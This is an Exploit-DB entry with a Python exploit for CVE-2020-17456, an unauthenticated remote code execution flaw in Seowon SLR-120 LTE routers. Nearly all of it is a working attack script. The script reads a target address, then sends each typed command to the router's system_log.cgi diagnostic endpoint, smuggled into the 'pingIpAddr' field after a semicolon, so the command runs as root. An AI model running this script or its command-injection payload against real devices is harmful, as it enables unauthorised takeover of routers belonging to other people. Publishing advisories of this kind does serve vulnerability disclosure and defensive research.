Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)

EDB-ID:

50821




Platform:

Hardware

Date:

2022-03-11


# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)
# Date: 2022-03-11
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://www.seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30
# Version: All version
# Tested on: Windows 10 Enterprise x64 , Linux
# CVE : CVE-2020-17456

# [ About - Seowon SLR-120 router ]:

#The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile,
#The convenience of sharing wireless internet access invigorates your lifestyle, families,
#friends and workmates. Carry it around to boost your active communication anywhere.

# [ Description ]:

#Execute commands without authentication as admin user ,
#To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.

# [ Vulnerable products ]:

#SLR-120S42G
#SLR-120D42G
#SLR-120T42G

import requests

print ('''
###########################################################                                         
#    Seowon SLR-120S42G router - RCE (Unauthenticated)    #
#                  BY:Aryan Chehreghani                   #
#        Team:TAPESH DIGITAL SECURITY TEAM IRAN           #
#             mail:aryanchehreghani@yahoo.com              #  
#                 -+-USE:python script.py                 #
#         Example Target : http://192.168.1.1:443/        #
###########################################################
''')

url = input ("=> Enter Target : ")

while(True):

    try:
    
        cmd = input ("~Enter Command $ ")
        
        header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q:0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "207",
"Origin": "http://192.168.1.1",
"Connection": "close",
"Referer": "http://192.168.1.1/",
"Upgrade-Insecure-Requests": "1"
}

        datas = {
'Command':'Diagnostic',
'traceMode':'ping',
'reportIpOnly':'',
'pingIpAddr':';'+cmd,
'pingPktSize':'56',
'pingTimeout':'30',
'pingCount':'4',
'maxTTLCnt':'30',
'queriesCnt':'3',
'reportIpOnlyCheckbox':'on',
'logarea':'com.cgi',
'btnApply':'Apply',
'T':'1646950471018'
}

        x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)

        print(x.text)

    except:
        break